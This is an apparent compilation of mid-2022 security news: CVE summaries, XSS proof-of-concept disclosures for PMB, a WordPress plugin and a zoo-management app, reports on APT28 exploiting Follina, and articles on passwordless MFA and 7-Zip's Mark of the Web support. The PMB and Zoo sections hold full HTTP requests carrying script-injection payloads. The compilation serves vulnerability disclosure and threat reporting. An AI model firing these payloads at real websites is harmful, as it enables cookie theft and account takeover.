The NT auth module in OpenAM before 14.6.6 allows a "replace Samba username attack."

**What's Changed**

*   fix WindowsDesktopSSO auth module NPE when kerberos token was not set by @maximthomas in #510
*   Issues/fix frontend build by @maximthomas in #511
*   FIX ObjectIdentifier equals by String form by @vharseko in #512
*   CVE-2022-34298 fix NT auth module vulnerability by @maximthomas (thanks Aliz Hammond , at watchTowr) in #514

**Full Changelog**: 14.6.5...14.6.6

CVE-2022-34298: Release 14.6.6 · OpenIdentityPlatform/OpenAM

An issue was discovered in SaltStack Salt in versions before 3002.9, 3003.5, 3004.2. PAM auth fails to reject locked accounts, which allows a previously authorized user whose account is locked still run Salt commands when their account is locked. This affects both local shell accounts with an active session and salt-api users that authenticate via PAM eauth.

CVE-2022-22967: Salt Project Package Repo

PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.

**PMB 7.3.10 - CVE-2022-34328**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser
*   Affected version : 7.3.10 >=

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    GET /index.php?lvl=author_see&id=42691%27%7cecho%20%3E%3C/a%3E%3C/span%3E%3Cscript%3Ealert(1)%3C/script%3Ed5u3g%20ijwh7gefly%20%23xzwx HTTP/1.1
    Host: xxxxx.fr
    Cookie: PhpMyBibli-OPACDB=pmb_test; _ga=GA1.2.80710046205; __utmz=147501360.tmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147501632.2; PhpMyBibli-COOKIECONSENT=!pmbstatopac=true
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    

**Preview**

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    POST /pmb/opac_css/index.php?lvl=search_result&search_type_asked=extended_search HTTP/1.1
    Host: localhost
    Content-Length: 165
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/opac_css/index.php?lvl=index&search_type_asked=extended_search
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PmbOpac-SESSNAME=PmbOpac; PmbOpac-SESSID=2044540279; PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6
    Connection: close
    
    add_field=&search%5B%5D=f_1&op_0_f_1=EXACT&field_0_f_1%5B%5D=gang&explicit_search=1&search_xml_file=search_fields&delete_field=&launch_search=1&page=&no_search=0&ij6fm%22%3e%3cscript%3ealert(1)%3c%2fscript%3evg9q6c4g1mk=1
    

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Stored ( Authentificated )

**POC**

There is an exemple with alert:

    POST /pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=save&id=3 HTTP/1.1
    Host: localhost
    Content-Length: 229
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; PhpMyBibli-LOGIN=admin; PhpMyBibli-SESSNAME=PhpMyBibli; PhpMyBibli-SESSID=4768651558; filesTreeSaveStateCookie=0.506966344966034%2C0.506966344966034%2F0.20485223066281089%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2F0.9885325597889434%2C0.506966344966034%2F0.21127644710407156%2F0.29958385610940796%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.5519183400871519%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.14825971714188912%2C0.506966344966034%2F0.20485223066281089%2F0.5972892199220485; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6; pmb4768651558=oj4vh2ag1b0eonnsirg5rmvn09
    Connection: close
    
    cms_editorial_type_label=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cms_editorial_type_comment=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&cms_editorial_type_page_selector=0&cms_editorial_type_page_var_selector=0&save_button=Enregistrer
    

**Preview**

CVE-2022-34328: GitHub - jenaye/PMB

The Bosch Ethernet switch PRA-ES8P2S with software version 1.01.05 runs its web server with root privilege. In combination with CVE-2022-23534 this could give an attacker root access to the switch.

CVE-2022-32535: Multiple Vulnerabilities PRA-ES8P2S Ethernet-Switch

The APT is pairing a known Microsoft flaw with a malicious document to load malware that nabs credentials from Chrome, Firefox and Edge browsers.

The APT is pairing a known Microsoft flaw with a malicious document to load malware that nabs credentials from Chrome, Firefox and Edge browsers.

Advanced persistent threat group Fancy Bear is behind a phishing campaign that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.

The attacks by the Russia-linked APT are tied the Russian and Ukraine war, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for Follina (CVE-2022-30190), a known Microsoft one-click flaw, according to a blog post published this week.

“This is the first time we’ve observed APT28 using Follina in its operations,” researchers wrote in the post. Fancy Bear is also known as APT28, Strontium and Sofacy.

On June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first reported by Google. Google’s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.

The Computer Emergency Response Team of Ukraine (CERT-UA) also independently discovered the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.

****Bear on the Loose****

CERT-UA previously identified Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating on the behest of Russian intelligence to gather info that would be useful to the agency.

In the past Fancy Bear has been linked in attacks targeting elections in the United States and Europe, as well as hacks against sporting and anti-doping agencies related to the 2020 Olympic Games.

Researchers first flagged Follina in April, but only in May was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they’re opened.

The bug is dangerous for a number of reasons–not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.

Microsoft recently patched Follina in its June Patch Tuesday release but it remains under active exploit by threat actors, including known APTs.

**Threat of Nuclear Attack**

Fancy Bear’s Follina campaign targets users with emails carrying a malicious RTF file called “Nuclear Terrorism A Very Real Threat” in an attempt to prey on victims’ fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an article from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.

The malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268\[.\]frge\[.\]io/article\[.\]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.

The PowerShell loads the final payload–a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.

In other functionality, the recently seen variant is “almost identical” to the earlier one, “with just a few minor refactors and some additional sleep commands,” they added.

As with the previous variant, the stealer’s main pupose is to steal data—including website credentials such as username, password and URL–from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.

“The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data,” they wrote. “The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.”

The owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.

Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug

Researchers have spotted the threat group, also known as Fancy Bear and Sofacy, using the Windows MSDT vulnerability to distribute information stealers to users in Ukraine.

Russia’s notorious advanced persistent threat group APT28 is the latest in a growing number of attackers trying to exploit the “Follina” vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows.

Researchers from Malwarebytes this week observed the threat actor — aka Fancy Bear and Sofacy — sending out a malicious document with an exploit for the now-patched flaw (CVE-2022-30190) via phishing emails to users in Ukraine. The document was titled “Nuclear Terrorism A Very Real Threat.rtf" and appeared designed to prey on fears about the war in Ukraine spiraling into a nuclear holocaust. 

Malwarebytes identified the contents of the document as a May 10 article from the Atlantic Council on the potential for Russian President Vladimir Putin to use nuclear weapons in Ukraine.

Users who opened the document ended up having a new version of a previously known .Net credential stealer loaded on their systems via the Follina exploit, which made headlines as a zero-day earlier this month. The malware is designed to steal usernames, passwords, and URLs from Chrome and Microsoft Edge browsers. It can also grab all stored cookies in Chrome, Malwarebytes researchers say.

Ukraine’s Computer Emergency Response Team (CERT-UA) separately warned of the same threat. In an advisory, it said it had spotted APT28 using the same malicious document that Malwarebytes reported to try and distribute the CredoMap credential-stealing malware to users in Ukraine. 

Available telemetry suggests that the adversary has been using the document since at least June 10, CERT-UA says.

“The target, and the involvement of APT28, (a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state,” states Malwarebytes in a report Tuesday on the new activity.

**The Follina Feeding Frenzy**

The Follina bug in MSDT exists in all current versions of Windows and can be exploited via malicious Microsoft Office documents. To trigger it, all an attacker needs to do is call MSDT from an Office app, such as Word, using the URL protocol. Attackers can exploit the flaw to gain remote control of vulnerable systems and take a variety of malicious actions on them, including executing malicious code, installing programs, modifying data, and creating new accounts. 

Microsoft disclosed the flaw in late May amid widespread zero-day exploit activity. The company finally issued a fix for the vulnerability in its Patch Tuesday set of monthly security updates for June.

Malwarebytes describes the Ukrainian campaign as the first time it had observed APT28 exploiting Follina. But numerous other groups, including other state-backed actors, have been actively exploiting the vulnerability in recent weeks.

Many of the attacks have targeted Ukrainian entities. Earlier this month, for instance, CERT-UA warned about a threat actor — likely Russia’s Sandworm APT group — using a Follina exploit in a “massive cyberattack” targeting media organizations in Ukraine. 

And just this week, CERT-UA warned about a threat group it is tracking as UAC-0098, which is targeting critical infrastructure facilities in Ukraine with a tax-themed document carrying a Follina exploit. According to the CERT-UA, the attackers in this campaign are exploiting Follina to drop the Cobalt Strike Beacon post-compromise attack tool on compromised systems.

Other reports of Follina-related activity have emerged as well, suggesting the flaw is of high interest to attackers and needs to be addressed quickly. Earlier this month, Proofpoint reported that it had blocked a likely stated-backed phishing campaign involving a Follina exploit that targeted a handful of its customers. The phishing email masqueraded as a document about a salary increase, which if opened would have resulted in a PowerShell script being downloaded to the system.

Symantec, too, has reported observing a variety of threat actors exploiting Follina to distribute different malicious payloads, including the AsyncRAT remote access Trojan and another unnamed malware for stealing cookies and save login data from browsers such as Chrome, Edge and Firefox.

Russia's APT28 Launches Nuke-Themed Follina Exploit Campaign

Using WebAuthn, physical keys, and biometrics, organizations can adopt more advanced passwordless MFA and true passwordless systems. (Part 2 of 2)

_The first article of this two-part series examined ways to improve multifactor authentication (MFA) and boost adoption. This story takes a look at how organizations can adopt more advanced passwordless MFA and true passwordless systems._

Getting to passwordless won't be easy, but the concept is finally gaining momentum. Although several vendors have offered passwordless MFA and true passwordless technology for a few years — mostly relegated to enterprise use — a more comprehensive framework is now taking shape. Apple, Google, and Microsoft have jointly agreed to adopt passwordless in earnest.

For example, Apple will be introducing Passkeys, which completely replace passwords used to log into websites, in a few months. The framework, based on the FIDO Alliance standard, uses biometrics such as Face ID to generate a unique, encrypted digital key that resides only on the device and within an encrypted keychain used for other Apple devices, including the iPhone, iPad, Mac, and Apple TV. This makes it impervious to phishing and other forms of data extraction.

In 2020, Microsoft turned to biometrics for authentication in Windows 10 and Windows 365 — and the company is also expanding passwordless to websites. In addition, all three companies are adding the ability to transfer this identity data across authenticated devices and systems. In the past, changing phones or other devices typically meant reinstalling credentials — a time-consuming and irritating task.

In addition to building biometrics and other security mechanisms into their operating systems, the Big Three are introducing software development kits (SDKs) that companies can use to build passwordless websites. As a result, it will soon be possible for consumers to begin ditching passwords for compliant sites and services. Like Apple's Passkey, a mobile phone or other registered device authenticates the person and then sends the request to the server without sending the biometric data.

"Where the big vendors lead, everyone else follows," says Don Tait, a senior analyst for Omdia.

At the heart of this transformation is the FIDO Alliance. "It is a classic example of the impact of consumerization on technology," adds Rik Turner, a senior analyst at Omdia. "As people begin to use tools in their private lives, they begin to seep into the workplace."

**A Matter of Identity**

Security experts say that the first step in building a better authentication framework is to stop using outdated methods like secret words and one-time codes to verify users. Even push apps are vulnerable to exploits. For example, crooks who gain access to a company's network or an MFA system can generate fake authentication requests that someone might authorize in a moment of distraction or inattentiveness.

Even highly secure YubiKeys and other U2F tokens aren't exempt from vulnerabilities and workarounds. For example, if a user forgets the key or can't use it for some reason, the typical workaround is to revert to a text code or less secure form of MFA as the backup. At that point, even an ultra-secure digital token can't provide protection.

A deeper and broader use of biometrics and user verification methods, including presence-based authentication and behavioral or activity-based models, is key. This includes the use of the FIDO protocol WebAuthn, which delivers an API that supports strong, public-key cryptography registration and authentication. It can be combined with a continuous authentication method that reverifies the identity of the session through a persistent token.

Several companies, including Beyond Identity, Veriff, 1Kosmos, and Jumio, have adopted this type of approach. They rely on FIDO standards that tie into biometrics, along with a highly secure identity proofing method. Typically, they ask users to provide a document such as a driver's license or a passport, which is securely stored in an app on the device. A selfie or face scan ensures that everything matches and authenticates the user.

For example, Veriff, which works in 190 countries, in 35 languages, and with 8,000 IDs, runs an online blockchain-based identity verification within a few seconds. It uses an AI-supported decision engine that incorporates real-time feedback through a document check, biometric scan, face comparison, background video, and device and network analytics. Financial institutions, healthcare providers, and others that use the technology can also reduce fake accounts and fraud.

"This creates a barrier that is much more difficult for an intelligent and determined bad actor to bypass," says Kalev Rundu, senior product manager at Veriff. "People today are much more willing to use biometrics for authentication, but they are only ready to do it if they receive real value in return and they can maintain control over how and where their data is used."

**Forward Thinking**

The move to passwordless MFA and true passwordless remains a slow march. For now, advanced authentication is more viable within the enterprise, where it's a closed and controlled environment. Michael Engle, co-founder and CSO at passwordless MFA solutions vendor 1kosmos, estimates that 80% of passwords can be eliminated almost immediately with the right strategy and tools.

For now, Omdia analysts Tait and Turner recommend migrating to passwordless MFA without delay. Not only does the framework deliver a better and safer customer experience, but it can also drive revenue growth, they argue. In addition, it's wise to phase in true passwordless systems and build on them through the FIDO Alliance, as well through Apple Passkeys and the equivalent passwordless systems at Google and Microsoft.

Along the way, it's also essential to educate customers and employees about passwordless authentication and ensure that people understand that their biometric data is being used as their gateway to apps and the Internet. The combination of better UX, incentives, and more streamlined processes can, over the long term, boost security, improve trust, and trim security costs.

Says Jasson Casey, CTO for Beyond Identity: "In the end, the objective isn't to eliminate passwords, though that's a noble cause. It's to create better security and a safer computing environment for everyone."

Evolving Beyond the Password: Vanquishing the Password

WordPress Download Manager plugin versions 3.2.43 and below suffer from a cross site scripting vulnerability.

Change Mirror Download

    Exploit Title: Download Manager Cross-Site ScriptingDate: 2022-06-16Exploit Author :  Andrea BocchettiVendor Homepage : https://wordpress.org/plugins/download-manager/Version :  <= 3.2.43Tested on: windowsCVE :  CVE-2022-2101######## Description ######### 1-) Login in the plugin page# 2-) add the xss payload in the field "Insert URL"# 3-) Click on the link , the JS code will be interpreted.

WordPress Download Manager 3.2.43 Cross Site Scripting

Zoo Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)# Date: 06/22/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: Server: XAMPP on Windows 10 # CVE: CVE-2022-31897# Description:Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.# Impact:An attacker could steal cookies with a crafted URL sent to the victims.# Exploit:Visit the following page: 1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>2) Alert pop up is fired!# Image poc:https://ibb.co/8XKDgJX -> Registration pagehttps://ibb.co/mTTmTmy -> XSS

Zoo Management System 1.0 Cross Site Scripting

Popular zipfile program 7-Zip now supports Microsoft's Mark of the Web feature. What is it, and how does it work?
The post 7-Zip gets Mark of the Web feature, increases protection for users appeared first on Malwarebytes Labs.

One of the most popular zip programs around, 7-Zip, now offers support for “Mark of the Web” (MOTW), which gives users better protection from malicious files.

This is good news. But what does that actually mean?

In the bad old days, opening up a downloaded document could be a fraught exercise. Malicious files would often have full permission from the system to do whatever they wanted. Compromised PCs were the inevitable end result, and infected attachments were extremely popular. Outside of regular security tools, there often wasn’t much else available to help stop the flow.

Microsoft’s file block feature in 2007 meant network administrators could lock down any attempt to open specific file types. Unfortunately, this was a little too restrictive for some users. Files couldn’t be opened, even in cases where the user knew they were safe.

Microsoft changed things up a little in 2010, with Protected View.

**Protected View: what is it?**

Every time you download a spreadsheet or Word document and open it up, some checking takes place in the background. Downloaded files produce a yellow bar with the following message:

> _Protected View: Be careful. Files from the internet can contain viruses. Unless you need to edit, it’s safer to stay in Protected View._

This isn’t too different to the old file block feature, with a few key differences. Firstly, you can actually look at the document you want to open. As it is locked into a read-only mode, it can’t do anything malicious to your system. Secondly, users now have the option to enable editing. While there are other potentially dangerous aspects to opening downloaded files, Microsoft has solutions for those too. There is, of course, something telling these programs to warn you about potentially dangerous files. This is where MOTW comes into play.

**How does Mark of the Web help?**

MOTW is perhaps most recently known for blocking VBA code from running in Office. When a file is downloaded, Windows adds a ZoneId to the file which is responsible for the warning message(s). When the system detects the mark, the yellow bar is replaced by a red one. Unlike it’s yellow counterpart, there is no enable content button. Those files are done, with no way back.

Right click a file you’ve downloaded, and in General properties you should see a message which reads:

> _This file came from another computer and might be blocked to help protect this computer._

This exists thanks to MOTW.

The mark doesn’t exist on the file itself, which is left untouched. Originally an Internet Explorer security feature, you’ll now find it keeping you from harm’s way across the Microsoft product range.

**Is this new addition a benefit for a zip program?**

Absolutely. As noted by Bleeping Computer, MOTW didn’t apply to files extracted with 7-Zip. As a result, you’d have Office files opening as if you’d created them yourself with no Protected View in sight.

With this now enabled in the latest version of 7-Zip, some key Windows security precautions are now back in place.

There are some caveats to this story. As we know, not everybody pays attention to security warnings. Computer users routinely ignore all manner of security alerts from their operating system, browser, and security tools. The design and placement of warnings can further deter people paying attention to them. On top of all that, bogus security warnings can further make things confusing for users.

No matter how many warning messages are displayed, some people will still click “Enable” on files they shouldn’t. Even so, opening downloaded files with restrictions applied from the get-go can only be a good thing.

Tag

#windows